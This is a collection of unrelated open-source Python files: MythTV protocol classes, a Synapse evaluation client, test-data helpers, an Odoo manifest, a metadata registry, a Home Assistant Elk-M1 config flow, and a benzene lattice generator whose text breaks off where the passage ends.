# # MythBox for XBMC - http://mythbox.googlecode.com # Copyright (C) 2011 analogue@yahoo.com # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # from mythbox.mythtv.enums import TVState, TVState44, TVState58 # MythTV Protcol Constants initVersion = 8 initToken = '' separator = u'[]:[]' serverVersion = None class ProtocolException(Exception): ''' Thrown on protcol version mismatch between frontend and backend or general protocol related errors. ''' pass class BaseProtocol(object): def version(self): raise Exception, 'Abstract method' def recordSize(self): return len(self.recordFields()) def tvState(self): raise Exception, 'Abstract method' def buildAnnounceFileTransferCommand(self, hostname, filePath): raise Exception, 'Abstract method' def getLiveTvBrain(self, settings, translator): raise Exception, 'Abstract method' def recordFields(self): return Exception, 'Abstract method' def emptyRecordFields(self): return [] def protocolToken(self): return "" def mythVersion(self): raise Exception, 'Abstract method' def supportsStreaming(self, platform): raise Exception, 'Abstract method' class Protocol40(BaseProtocol): def version(self): return 40 def mythVersion(self): return '0.21' def recordFields(self): # Based on from https://github.com/MythTV/mythtv/blob/v0.23.1/mythtv/bindings/python/MythTV/MythData.py return [ 'title', 'subtitle', 'description', 'category', 'chanid', 'channum', 'callsign', 'channame', 'filename', 'fs_high', 'fs_low', 'starttime', 'endtime', 'duplicate', 'shareable', 'findid', 'hostname', 'sourceid', 'cardid', 'inputid', 'recpriority', 'recstatus', 'recordid', 'rectype', 'dupin', 'dupmethod', 'recstartts', 'recendts', 'repeat', 'programflags', 'recgroup', 'commfree', 'outputfilters', 'seriesid', 'programid', 'lastmodified', 'stars', 'airdate', 'hasairdate', 'playgroup', 'recpriority2', 'parentid', 'storagegroup', 'audio_props', 'video_props', 'subtitle_type'] def tvState(self): return TVState def buildAnnounceFileTransferCommand(self, hostname, filePath): return ["ANN FileTransfer %s" % hostname, filePath] def getLiveTvBrain(self, settings, translator): from mythbox.ui.livetv import MythLiveTvBrain return MythLiveTvBrain(settings, translator) def getFileSize(self, program): from mythbox.mythtv.conn import decodeLongLong return decodeLongLong(int(program.getField('fs_low')), int(program.getField('fs_high'))) / 1024.0 def genPixMapCommand(self): return ['QUERY_GENPIXMAP'] def genQueryRecordingsCommand(self): return ['QUERY_RECORDINGS Play'] def genPixMapPreviewFilename(self, program): return program.getBareFilename() + '.640x360.png' def supportsStreaming(self, platform): return True class Protocol41(Protocol40): def version(self): return 41 class Protocol42(Protocol41): def version(self): return 42 class Protocol43(Protocol42): def version(self): return 43 def recordFields(self): # Copied from https://github.com/MythTV/mythtv/blob/v0.23.1/mythtv/bindings/python/MythTV/MythData.py return [ 'title', 'subtitle', 'description', 'category', 'chanid', 'channum', 'callsign', 'channame', 'filename', 'fs_high', 'fs_low', 'starttime', 'endtime', 'duplicate', 'shareable', 'findid', 'hostname', 'sourceid', 'cardid', 'inputid', 'recpriority', 'recstatus', 'recordid', 'rectype', 'dupin', 'dupmethod', 'recstartts', 'recendts', 'repeat', 'programflags', 'recgroup', 'commfree', 'outputfilters', 'seriesid', 'programid', 'lastmodified', 'stars', 'airdate', 'hasairdate', 'playgroup', 'recpriority2', 'parentid', 'storagegroup', 'audio_props', 'video_props', 'subtitle_type','year'] class Protocol44(Protocol43): def version(self): return 44 def tvState(self): return TVState44 class Protocol45(Protocol44): def version(self): return 45 def buildAnnounceFileTransferCommand(self, hostname, filePath): # TODO: Storage group should be non-empty for recordings storageGroup = '' return ['ANN FileTransfer %s' % hostname, filePath, storageGroup] class Protocol46(Protocol45): def version(self): return 46 class Protocol47(Protocol46): def version(self): return 47 class Protocol48(Protocol47): def version(self): return 48 class Protocol49(Protocol48): def version(self): return 49 class Protocol50(Protocol49): def version(self): return 50 def mythVersion(self): return '0.22' class Protocol56(Protocol50): def version(self): return 56 def mythVersion(self): return '0.23' class Protocol23056(Protocol56): def version(self): return 23056 def mythVersion(self): return '0.23.1' class Protocol57(Protocol56): def version(self): return 57 def mythVersion(self): return '0.24' def recordFields(self): return ['title','subtitle','description', 'category','chanid','channum', 'callsign','channame','filename', 'filesize','starttime','endtime', 'findid','hostname','sourceid', 'cardid','inputid','recpriority', 'recstatus','recordid','rectype', 'dupin','dupmethod','recstartts', 'recendts','programflags','recgroup', 'outputfilters','seriesid','programid', 'lastmodified','stars','airdate', 'playgroup','recpriority2','parentid', 'storagegroup','audio_props','video_props', 'subtitle_type','year'] def buildAnnounceFileTransferCommand(self, hostname, filePath): return ["ANN FileTransfer %s 0" % hostname, filePath, 'Default'] def getFileSize(self, program): return int(program.getField('filesize')) / 1024.0 def supportsStreaming(self, platform): # Eden and up return platform.xbmcVersion() >= 11.0 class Protocol58(Protocol57): def tvState(self): return TVState58 def version(self): return 58 class Protocol59(Protocol58): def version(self): return 59 class Protocol60(Protocol59): def version(self): return 60 def buildAnnounceFileTransferCommand(self, hostname, filePath): return ["ANN FileTransfer %s 0 1 10000" % hostname, filePath, 'Default'] def genPixMapCommand(self): return ['QUERY_GENPIXMAP2', 'do_not_care'] def genPixMapPreviewFilename(self, program): return '<EMPTY>' class Protocol61(Protocol60): def version(self): return 61 class Protocol62(Protocol61): def version(self): return 62 def protocolToken(self): return "78B5631E" class Protocol63(Protocol62): def version(self): return 63 def protocolToken(self): return "3875641D" class Protocol64(Protocol63): def version(self): return 64 def protocolToken(self): return "8675309J" class Protocol65(Protocol64): def version(self): return 65 def protocolToken(self): return "D2BB94C2" def genQueryRecordingsCommand(self): # technically the old query recs command works but actually causes sorting which would be redundant and may be removed in the future return ['QUERY_RECORDINGS Unsorted'] # Current rev in mythversion.h protocols = { 40: Protocol40(), 41: Protocol41(), 42: Protocol42(), 43: Protocol43(), 44: Protocol44(), 45: Protocol45(), 46: Protocol46(), 47: Protocol47(), 48: Protocol48(), 49: Protocol49(), 50: Protocol50(), # 0.22 56: Protocol56(), # 0.23 23056: Protocol23056(), # 0.23.1 - mythbuntu weirdness 57: Protocol57(), # 0.24 58: Protocol58(), # 0.24 59: Protocol59(), # 0.24 60: Protocol60(), # 0.24 61: Protocol61(), # 0.24 62: Protocol62(), # 0.24 63: Protocol63(), # 0.24 64: Protocol64(), # 0.24 65: Protocol65() # 0.24 }
gpl-2.0
larssono/synapsePythonClient
synapseclient/evaluation.py
1
7009
""" *********** Evaluations *********** An evaluation_ object represents a collection of Synapse Entities that will be processed in a particular way. This could mean scoring Entries in a challenge or executing a processing pipeline. Imports:: from synapseclient import Evaluation, Submission, SubmissionStatus Evaluations can be retrieved by ID:: evaluation = syn.getEvaluation(1901877) Like entities, evaluations are access controlled via ACLs. The :py:func:`synapseclient.Synapse.getPermissions` and :py:func:`synapseclient.Synapse.setPermissions` methods work for evaluations: access = syn.getPermissions(evaluation, user_id) The :py:func:`synapseclient.Synapse.submit` method returns a Submission_ object:: entity = syn.get(synapse_id) submission = syn.submit(evaluation, entity, name='My Data', team='My Team') The Submission object can then be used to check the `status <#submission-status>`_ of the submission:: status = syn.getSubmissionStatus(submission) The status of a submission may be: - **INVALID** the submitted entity is in the wrong format - **SCORED** in the context of a challenge or competition - **OPEN** indicating processing *has not* completed - **CLOSED** indicating processing *has* completed Submission status objects can be updated, usually by changing the *status* and *score* fields, and stored back to Synapse using :py:func:`synapseclient.Synapse.store`:: status.score = 0.99 status.status = 'SCORED' status = syn.store(status) See: - :py:func:`synapseclient.Synapse.getEvaluation` - :py:func:`synapseclient.Synapse.getEvaluationByContentSource` - :py:func:`synapseclient.Synapse.getEvaluationByName` - :py:func:`synapseclient.Synapse.submit` - :py:func:`synapseclient.Synapse.getSubmissions` - :py:func:`synapseclient.Synapse.getSubmission` - :py:func:`synapseclient.Synapse.getSubmissionStatus` - :py:func:`synapseclient.Synapse.getPermissions` - :py:func:`synapseclient.Synapse.setPermissions` ~~~~~~~~~~ Evaluation ~~~~~~~~~~ .. autoclass:: synapseclient.evaluation.Evaluation :members: __init__ ~~~~~~~~~~ Submission ~~~~~~~~~~ .. autoclass:: synapseclient.evaluation.Submission :members: __init__ ~~~~~~~~~~~~~~~~~ Submission Status ~~~~~~~~~~~~~~~~~ .. autoclass:: synapseclient.evaluation.SubmissionStatus :members: __init__ """ from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import sys from synapseclient.exceptions import * from synapseclient.dict_object import DictObject class Evaluation(DictObject): """ Keeps track of an evaluation queue in Synapse. Allowing for submissions, retrieval and scoring. :param name: Name of the evaluation :param description: A short description describing the evaluation :param contentSource: Synapse Project or entity associated with the evaluation :param submissionReceiptMessage: Message to display to users upon submission :param submissionInstructionsMessage: Message to display to users detailing acceptable formatting for submissions `To create an Evaluation <http://docs.synapse.org/rest/org/sagebionetworks/evaluation/model/Evaluation.html>`_ and store it in Synapse:: evaluation = syn.store(Evaluation( name="Q1 Final", description="Predict progression of MMSE scores for final scoring", contentSource="syn2290704")) The contentSource field links the evaluation to its :py:class:`synapseclient.entity.Project`. (Or, really, any synapse ID, but sticking to projects is a good idea.) `Evaluations <http://docs.synapse.org/rest/org/sagebionetworks/evaluation/model/Evaluation.html>`_ can be retrieved from Synapse by ID:: evaluation = syn.getEvaluation(1901877) ...by the Synapse ID of the content source (associated entity):: evaluation = syn.getEvaluationByContentSource('syn12345') ...or by the name of the evaluation:: evaluation = syn.getEvaluationByName('Foo Challenge Question 1') """ @classmethod def getByNameURI(cls, name): return '/evaluation/name/%s' %name @classmethod def getURI(cls, id): return '/evaluation/%s' %id def __init__(self, **kwargs): kwargs['status'] = kwargs.get('status', 'OPEN') kwargs['contentSource'] = kwargs.get('contentSource', '') if kwargs['status'] not in ['OPEN', 'PLANNED', 'CLOSED', 'COMPLETED']: raise ValueError('Evaluation Status must be one of [OPEN, PLANNED, CLOSED, COMPLETED]') if not kwargs['contentSource'].startswith('syn'): #Verify that synapse Id given raise ValueError('The "contentSource" parameter must be specified as a Synapse Entity when creating an Evaluation') super(Evaluation, self).__init__(kwargs) def postURI(self): return '/evaluation' def putURI(self): return '/evaluation/%s' %self.id def deleteURI(self): return '/evaluation/%s' %self.id def getACLURI(self): return '/evaluation/%s/acl' %self.id def putACLURI(self): return '/evaluation/acl' class Submission(DictObject): """ Builds an Synapse submission object. :param name: Name of submission :param entityId: Synapse ID of the Entity to submit :param evaluationId: ID of the Evaluation to which the Entity is to be submitted :param versionNumber: Version number of the submitted Entity :param submitterAlias: A pseudonym or team name for a challenge entry """ @classmethod def getURI(cls, id): return '/evaluation/submission/%s' %id def __init__(self, **kwargs): if not ('evaluationId' in kwargs and 'entityId' in kwargs and 'versionNumber' in kwargs): raise KeyError super(Submission, self).__init__(kwargs) def postURI(self): return '/evaluation/submission?etag=%s' %self.etag def putURI(self): return '/evaluation/submission/%s' %self.id def deleteURI(self): return '/evaluation/submission/%s' %self.id class SubmissionStatus(DictObject): """ Builds an Synapse submission status object. :param score: The score of the submission :param status: Status can be one of {'OPEN', 'CLOSED', 'SCORED', 'INVALID'}. """ @classmethod def getURI(cls, id): return '/evaluation/submission/%s/status' %id def __init__(self, **kwargs): super(SubmissionStatus, self).__init__(kwargs) def postURI(self): return '/evaluation/submission/%s/status' %self.id def putURI(self): return '/evaluation/submission/%s/status' %self.id def deleteURI(self): return '/evaluation/submission/%s/status' %self.id
apache-2.0
Dhanayan123/indivo_server
indivo/tests/data/base.py
4
8765
import copy, random, string __all__ = [ 'TestDataContext', 'TestModel', 'TestDataItem', 'scope', 'ForeignKey', 'ManyToManyKey', ] class TestDataContext(object): MARKED = 'marked' def __init__(self): self.subcontexts = [{}] def tdi_id(self, tdi): """ Get a unique id for the test_data. This is composed of two things: the actual id() of the list that it came from, and the index in that list. If we have a lazy item, we'll have to de-ref it here. """ if tdi.lazy: tdi._get_data_list() return '%s_%s'%(str(id(tdi.data_list)), str(tdi.index)) def del_model(self, test_data_id, subcontext_id): subcontext = self.subcontexts[subcontext_id] if subcontext.has_key(test_data_id): del subcontext[test_data_id] else: raise ValueError('No such model') def _add_subcontext(self): # DISABLED, FOR NOW # self.subcontexts.append({}) return len(self.subcontexts) - 1 def _generate_random_string(self, length=5): return "".join([random.choice(string.printable[0:62]) for i in range(length)]) def _add_model(self, test_data_item, subcontext_id, force_create=False, **overrides): test_model_id = self.tdi_id(test_data_item) # Look for the desired model in our subcontext subcontext = self.subcontexts[subcontext_id] # First time we've ever seen this model: Mark for processing if not subcontext.has_key(test_model_id): subcontext[test_model_id] = self.MARKED # We've seen this model before, but it hasn't been fully saved yet # Ideally, we would handle this behavior in a sophisticated way # (i.e. add ourself to a queue for later processing). # But this is just test data, after all, and these chains can only # occur if the test data is created with circular foreignkey references, # so let's just complain. elif subcontext[test_model_id] == self.MARKED: raise Exception('Circular references in test data: can\'t save test items.') # We've seen this model before, and it has been fully saved: just return it, unless # We've been explicitly told not to. elif not force_create: return subcontext[test_model_id] # We want to create 2 of the same model. Extend the model's id to make it unique. # NOTE: any reference to the same index of the same list will return the first # instance of the model, not this one. This one must be found using the identifier # passed into the TestModel constructor. else: test_model_id = '%s%s'%(test_model_id, self._generate_random_string()) subcontext[test_model_id] = self.MARKED # create the model, with info that points to this specific subcontext raw_data_dict = copy.deepcopy(test_data_item.raw_data) raw_data_dict.update(identifier=test_model_id, context=self, subcontext_id=subcontext_id) raw_data_dict.update(overrides) test_model = test_data_item.tm_subclass(**raw_data_dict) # register it with our subcontext, now that processing is done subcontext[test_model_id] = test_model return test_model def add_key(self, key, from_instance): subcontext_id = from_instance.subcontext_id try: ret = [] for test_data_item in key.to: ret.append(self._add_model(test_data_item, subcontext_id)) return ret except TypeError: return self._add_model(key.to, subcontext_id) def add_model(self, test_data_item, **overrides): subcontext_id = self._add_subcontext() return self._add_model(test_data_item, subcontext_id, **overrides) class TestModel(object): model_fields = [] # A list of field names needed to construct a Django Model model_class = None # The Django Model Subclass to construct def __init__(self, identifier, context, subcontext_id, **subclass_args): self.identifier = identifier self.context = context self.subcontext_id = subcontext_id self._setupargs(**subclass_args) self.marked_for_save = False def _setupargs(self, **subclass_args): """ Should be overriden by subclasses to take initialization args and set up the subclass model. """ raise NotImplementedError def update(self, field_dict, **fields): field_dict.update(fields) for k, v in field_dict.iteritems(): setattr(self, k, v) def __setattr__(self, item, value): """Update our django_object whenever our fields get updated. Follow foreignKeys. """ # setup foreign keys self_attr_val, django_obj_attr_val = self._foreign_key_check(value) # update the django object if hasattr(self, 'django_obj') and item in self.model_fields: setattr(self.django_obj, item, django_obj_attr_val) self.dirty = True return super(TestModel, self).__setattr__(item, self_attr_val) def _foreign_key_check(self, field): if isinstance(field, ForeignKey): tm = self.context.add_key(field, self) return (tm, tm.save()) elif isinstance(field, TestModel): return (field, field.save()) elif isinstance(field, ManyToManyKey): tms = self.context.add_key(field, self) return (tms, [tm.save() for tm in tms]) elif isinstance(field, list) and field and isinstance(field[0], TestModel): return (field, [tm.save() for tm in field]) return (field, field) def build_django_obj(self): # handle foreign keys model_args = dict([(f, self._foreign_key_check(getattr(self, f))[1]) for f in self.model_fields]) self.django_obj = self.model_class(**model_args) def save(self): # Make sure we've built the object to save dobj_p = getattr(self, 'django_obj', False) if not dobj_p: self.build_django_obj() # Save our django object dirty_p = getattr(self, 'dirty', True) if dirty_p: self.django_obj.save() self.dirty = False return self.django_obj class TestDataItem(object): def __init__(self, index, module_name=None, list_name=None, data_list=None, lazy=False): self.index = index self.lazy = lazy if lazy: self.module_name = module_name self.list_name = list_name self.data_list = None else: self.data_list = data_list def _get_data_list(self): self.data_list = getattr(__import__(self.module_name, globals(), locals(), [self.list_name], -1), self.list_name) @property def tm_subclass(self): if self.data_list is None: self._get_data_list() return self.data_list.model_class @property def raw_data(self): if self.data_list is None: self._get_data_list() return self.data_list[self.index] def scope(raw_list, tm_subclass): class TestModelScopedList(list): def __init__(self, tm_subclass, *args, **kwargs): self.model_class = tm_subclass return super(TestModelScopedList, self).__init__(*args, **kwargs) def __add__(self, other): """ Allow concatenation of multiple scoped lists with the same tm_subclass. """ other_model_class = getattr(other, 'model_class', None) if other_model_class and other_model_class == self.model_class: return TestModelScopedList(self.model_class, super(TestModelScopedList, self).__add__(other)) else: raise TypeError('Can only concatenate TestModelScopedLists with the same TestModel subclasses') return TestModelScopedList(tm_subclass, raw_list) class Key(object): def __init__(self, module_name, list_name, index_arg): self.module_name = module_name self.list_name = list_name self.index_arg = index_arg @property def to(self): """ Should return the raw TestDataIdentifier(s) pointed to by the key. """ raise NotImplementedError class ForeignKey(Key): @property def to(self): return TestDataItem(self.index_arg, module_name=self.module_name, list_name=self.list_name, lazy=True) class ManyToManyKey(Key): @property def to(self): return [TestDataItem(i, module_name=self.module_name, list_name=self.list_name, lazy=True) for i in self.index_arg]
gpl-3.0
fuselock/odoo
addons/report_intrastat/__openerp__.py
261
1805
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## { 'name': 'Intrastat Reporting', 'version': '1.0', 'category': 'Accounting & Finance', 'description': """ A module that adds intrastat reports. ===================================== This module gives the details of the goods traded between the countries of European Union.""", 'author': 'OpenERP SA', 'website': 'http://www.openerp.com', 'depends': ['base', 'product', 'stock', 'sale', 'purchase'], 'data': [ 'security/ir.model.access.csv', 'report_intrastat_view.xml', 'intrastat_report.xml', 'report_intrastat_data.xml', 'views/report_intrastatinvoice.xml' ], 'demo': [], 'test': ['test/report_intrastat_report.yml'], 'installable': True, 'auto_install': False, } # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
Manouchehri/metagoofil
hachoir_metadata/register.py
16
7060
from hachoir_core.i18n import _ from hachoir_core.tools import ( humanDuration, humanBitRate, humanFrequency, humanBitSize, humanFilesize, humanDatetime) from hachoir_core.language import Language from hachoir_metadata.filter import Filter, NumberFilter, DATETIME_FILTER from datetime import date, datetime, timedelta from hachoir_metadata.formatter import ( humanAudioChannel, humanFrameRate, humanComprRate, humanAltitude, humanPixelSize, humanDPI) from hachoir_metadata.setter import ( setDatetime, setTrackNumber, setTrackTotal, setLanguage) from hachoir_metadata.metadata_item import Data MIN_SAMPLE_RATE = 1000 # 1 kHz MAX_SAMPLE_RATE = 192000 # 192 kHz MAX_NB_CHANNEL = 8 # 8 channels MAX_WIDTH = 20000 # 20 000 pixels MAX_BIT_RATE = 500 * 1024 * 1024 # 500 Mbit/s MAX_HEIGHT = MAX_WIDTH MAX_DPI_WIDTH = 10000 MAX_DPI_HEIGHT = MAX_DPI_WIDTH MAX_NB_COLOR = 2 ** 24 # 16 million of color MAX_BITS_PER_PIXEL = 256 # 256 bits/pixel MAX_FRAME_RATE = 150 # 150 frame/sec MAX_NB_PAGE = 20000 MAX_COMPR_RATE = 1000.0 MIN_COMPR_RATE = 0.001 MAX_TRACK = 999 DURATION_FILTER = Filter(timedelta, timedelta(milliseconds=1), timedelta(days=365)) def registerAllItems(meta): meta.register(Data("title", 100, _("Title"), type=unicode)) meta.register(Data("artist", 101, _("Artist"), type=unicode)) meta.register(Data("author", 102, _("Author"), type=unicode)) meta.register(Data("music_composer", 103, _("Music composer"), type=unicode)) meta.register(Data("album", 200, _("Album"), type=unicode)) meta.register(Data("duration", 201, _("Duration"), # integer in milliseconde type=timedelta, text_handler=humanDuration, filter=DURATION_FILTER)) meta.register(Data("nb_page", 202, _("Nb page"), filter=NumberFilter(1, MAX_NB_PAGE))) meta.register(Data("music_genre", 203, _("Music genre"), type=unicode)) meta.register(Data("language", 204, _("Language"), conversion=setLanguage, type=Language)) meta.register(Data("track_number", 205, _("Track number"), conversion=setTrackNumber, filter=NumberFilter(1, MAX_TRACK), type=(int, long))) meta.register(Data("track_total", 206, _("Track total"), conversion=setTrackTotal, filter=NumberFilter(1, MAX_TRACK), type=(int, long))) meta.register(Data("organization", 210, _("Organization"), type=unicode)) meta.register(Data("version", 220, _("Version"))) meta.register(Data("width", 301, _("Image width"), filter=NumberFilter(1, MAX_WIDTH), type=(int, long), text_handler=humanPixelSize)) meta.register(Data("height", 302, _("Image height"), filter=NumberFilter(1, MAX_HEIGHT), type=(int, long), text_handler=humanPixelSize)) meta.register(Data("nb_channel", 303, _("Channel"), text_handler=humanAudioChannel, filter=NumberFilter(1, MAX_NB_CHANNEL), type=(int, long))) meta.register(Data("sample_rate", 304, _("Sample rate"), text_handler=humanFrequency, filter=NumberFilter(MIN_SAMPLE_RATE, MAX_SAMPLE_RATE), type=(int, long, float))) meta.register(Data("bits_per_sample", 305, _("Bits/sample"), text_handler=humanBitSize, filter=NumberFilter(1, 64), type=(int, long))) meta.register(Data("image_orientation", 306, _("Image orientation"))) meta.register(Data("nb_colors", 307, _("Number of colors"), filter=NumberFilter(1, MAX_NB_COLOR), type=(int, long))) meta.register(Data("bits_per_pixel", 308, _("Bits/pixel"), filter=NumberFilter(1, MAX_BITS_PER_PIXEL), type=(int, long))) meta.register(Data("filename", 309, _("File name"), type=unicode)) meta.register(Data("file_size", 310, _("File size"), text_handler=humanFilesize, type=(int, long))) meta.register(Data("pixel_format", 311, _("Pixel format"))) meta.register(Data("compr_size", 312, _("Compressed file size"), text_handler=humanFilesize, type=(int, long))) meta.register(Data("compr_rate", 313, _("Compression rate"), text_handler=humanComprRate, filter=NumberFilter(MIN_COMPR_RATE, MAX_COMPR_RATE), type=(int, long, float))) meta.register(Data("width_dpi", 320, _("Image DPI width"), filter=NumberFilter(1, MAX_DPI_WIDTH), type=(int, long), text_handler=humanDPI)) meta.register(Data("height_dpi", 321, _("Image DPI height"), filter=NumberFilter(1, MAX_DPI_HEIGHT), type=(int, long), text_handler=humanDPI)) meta.register(Data("file_attr", 400, _("File attributes"))) meta.register(Data("file_type", 401, _("File type"))) meta.register(Data("subtitle_author", 402, _("Subtitle author"), type=unicode)) meta.register(Data("creation_date", 500, _("Creation date"), text_handler=humanDatetime, filter=DATETIME_FILTER, type=(datetime, date), conversion=setDatetime)) meta.register(Data("last_modification", 501, _("Last modification"), text_handler=humanDatetime, filter=DATETIME_FILTER, type=(datetime, date), conversion=setDatetime)) meta.register(Data("revision_history", 502, _("Revision history"),type=unicode)) meta.register(Data("latitude", 510, _("Latitude"), type=float)) meta.register(Data("longitude", 511, _("Longitude"), type=float)) meta.register(Data("altitude", 511, _("Altitude"), type=float, text_handler=humanAltitude)) meta.register(Data("location", 530, _("Location"), type=unicode)) meta.register(Data("city", 531, _("City"), type=unicode)) meta.register(Data("country", 532, _("Country"), type=unicode)) meta.register(Data("charset", 540, _("Charset"), type=unicode)) meta.register(Data("font_weight", 550, _("Font weight"))) meta.register(Data("camera_aperture", 520, _("Camera aperture"))) meta.register(Data("camera_focal", 521, _("Camera focal"))) meta.register(Data("camera_exposure", 522, _("Camera exposure"))) meta.register(Data("camera_brightness", 530, _("Camera brightness"))) meta.register(Data("camera_model", 531, _("Camera model"), type=unicode)) meta.register(Data("camera_manufacturer", 532, _("Camera manufacturer"), type=unicode)) meta.register(Data("compression", 600, _("Compression"))) meta.register(Data("copyright", 601, _("Copyright"), type=unicode)) meta.register(Data("url", 602, _("URL"), type=unicode)) meta.register(Data("frame_rate", 603, _("Frame rate"), text_handler=humanFrameRate, filter=NumberFilter(1, MAX_FRAME_RATE), type=(int, long, float))) meta.register(Data("bit_rate", 604, _("Bit rate"), text_handler=humanBitRate, filter=NumberFilter(1, MAX_BIT_RATE), type=(int, long, float))) meta.register(Data("aspect_ratio", 604, _("Aspect ratio"), type=(int, long, float))) meta.register(Data("os", 900, _("OS"), type=unicode)) meta.register(Data("producer", 901, _("Producer"), type=unicode)) meta.register(Data("comment", 902, _("Comment"), type=unicode)) meta.register(Data("format_version", 950, _("Format version"), type=unicode)) meta.register(Data("mime_type", 951, _("MIME type"), type=unicode)) meta.register(Data("endian", 952, _("Endianness"), type=unicode))
gpl-2.0
GenericStudent/home-assistant
homeassistant/components/elkm1/config_flow.py
9
5265
"""Config flow for Elk-M1 Control integration.""" import logging from urllib.parse import urlparse import elkm1_lib as elkm1 import voluptuous as vol from homeassistant import config_entries, exceptions from homeassistant.const import ( CONF_ADDRESS, CONF_HOST, CONF_PASSWORD, CONF_PROTOCOL, CONF_TEMPERATURE_UNIT, CONF_USERNAME, TEMP_CELSIUS, TEMP_FAHRENHEIT, ) from homeassistant.util import slugify from . import async_wait_for_elk_to_sync from .const import CONF_AUTO_CONFIGURE, CONF_PREFIX from .const import DOMAIN # pylint:disable=unused-import _LOGGER = logging.getLogger(__name__) PROTOCOL_MAP = {"secure": "elks://", "non-secure": "elk://", "serial": "serial://"} DATA_SCHEMA = vol.Schema( { vol.Required(CONF_PROTOCOL, default="secure"): vol.In( ["secure", "non-secure", "serial"] ), vol.Required(CONF_ADDRESS): str, vol.Optional(CONF_USERNAME, default=""): str, vol.Optional(CONF_PASSWORD, default=""): str, vol.Optional(CONF_PREFIX, default=""): str, vol.Optional(CONF_TEMPERATURE_UNIT, default=TEMP_FAHRENHEIT): vol.In( [TEMP_FAHRENHEIT, TEMP_CELSIUS] ), } ) VALIDATE_TIMEOUT = 35 async def validate_input(data): """Validate the user input allows us to connect. Data has the keys from DATA_SCHEMA with values provided by the user. """ userid = data.get(CONF_USERNAME) password = data.get(CONF_PASSWORD) prefix = data[CONF_PREFIX] url = _make_url_from_data(data) requires_password = url.startswith("elks://") if requires_password and (not userid or not password): raise InvalidAuth elk = elkm1.Elk( {"url": url, "userid": userid, "password": password, "element_list": ["panel"]} ) elk.connect() timed_out = False if not await async_wait_for_elk_to_sync(elk, VALIDATE_TIMEOUT): _LOGGER.error( "Timed out after %d seconds while trying to sync with ElkM1 at %s", VALIDATE_TIMEOUT, url, ) timed_out = True elk.disconnect() if timed_out: raise CannotConnect if elk.invalid_auth: raise InvalidAuth device_name = data[CONF_PREFIX] if data[CONF_PREFIX] else "ElkM1" # Return info that you want to store in the config entry. return {"title": device_name, CONF_HOST: url, CONF_PREFIX: slugify(prefix)} def _make_url_from_data(data): host = data.get(CONF_HOST) if host: return host protocol = PROTOCOL_MAP[data[CONF_PROTOCOL]] address = data[CONF_ADDRESS] return f"{protocol}{address}" class ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN): """Handle a config flow for Elk-M1 Control.""" VERSION = 1 CONNECTION_CLASS = config_entries.CONN_CLASS_LOCAL_PUSH def __init__(self): """Initialize the elkm1 config flow.""" self.importing = False async def async_step_user(self, user_input=None): """Handle the initial step.""" errors = {} if user_input is not None: if self._url_already_configured(_make_url_from_data(user_input)): return self.async_abort(reason="address_already_configured") try: info = await validate_input(user_input) except CannotConnect: errors["base"] = "cannot_connect" except InvalidAuth: errors["base"] = "invalid_auth" except Exception: # pylint: disable=broad-except _LOGGER.exception("Unexpected exception") errors["base"] = "unknown" if "base" not in errors: await self.async_set_unique_id(user_input[CONF_PREFIX]) self._abort_if_unique_id_configured() if self.importing: return self.async_create_entry(title=info["title"], data=user_input) return self.async_create_entry( title=info["title"], data={ CONF_HOST: info[CONF_HOST], CONF_USERNAME: user_input[CONF_USERNAME], CONF_PASSWORD: user_input[CONF_PASSWORD], CONF_AUTO_CONFIGURE: True, CONF_TEMPERATURE_UNIT: user_input[CONF_TEMPERATURE_UNIT], CONF_PREFIX: info[CONF_PREFIX], }, ) return self.async_show_form( step_id="user", data_schema=DATA_SCHEMA, errors=errors ) async def async_step_import(self, user_input): """Handle import.""" self.importing = True return await self.async_step_user(user_input) def _url_already_configured(self, url): """See if we already have a elkm1 matching user input configured.""" existing_hosts = { urlparse(entry.data[CONF_HOST]).hostname for entry in self._async_current_entries() } return urlparse(url).hostname in existing_hosts class CannotConnect(exceptions.HomeAssistantError): """Error to indicate we cannot connect.""" class InvalidAuth(exceptions.HomeAssistantError): """Error to indicate there is invalid auth."""
apache-2.0
ajkerr0/kappa
kappa/lattice/benzene.py
1
1738
# -*- coding: utf-8 -*- """ Created on Tue Mar 1 16:54:05 2016 @author: alex """ import numpy as np def main(): posList = generate_benzene_sites() nList,zList = get_neighbors() return posList, nList, zList def generate_benzene_sites(): """Generate the locations of a benzene ring, one without hydrogen for attachment to something else.""" #starting distance a = 1.45 angle = 120 #degrees angle = angle*np.pi/180.0/2.0 C1pos = np.array([0.,0.,0.]) C2pos = C1pos + np.array([a*np.cos(angle),a*np.sin(angle),0.]) C3pos = C2pos + np.array([a,0.,0.]) C4pos = C1pos + np.array([a*np.cos(angle),-a*np.sin(angle),0.]) C5pos = C4pos + np.array([a,0.,0.]) C6pos = C5pos + np.array([a*np.cos(angle),a*np.sin(angle),0.]) a = 1.15 H2pos = C2pos + np.array([-a*np.cos(angle),a*np.sin(angle),0.]) H3pos = C3pos + np.array([a*np.cos(angle),a*np.sin(angle),0.]) # H6pos = C6pos + np.array([a,0.,0.]) H5pos = C5pos + np.array([a*np.cos(angle),-a*np.sin(angle),0.]) H4pos = C4pos + np.array([-a*np.cos(angle),-a*np.sin(angle),0.]) CList = [C1pos,C2pos,C3pos,C4pos,C5pos,C6pos] HList = [H2pos,H3pos,H4pos,H5pos] CList.extend(HList) return CList def get_neighbors(): nList = [] #six carbons, four 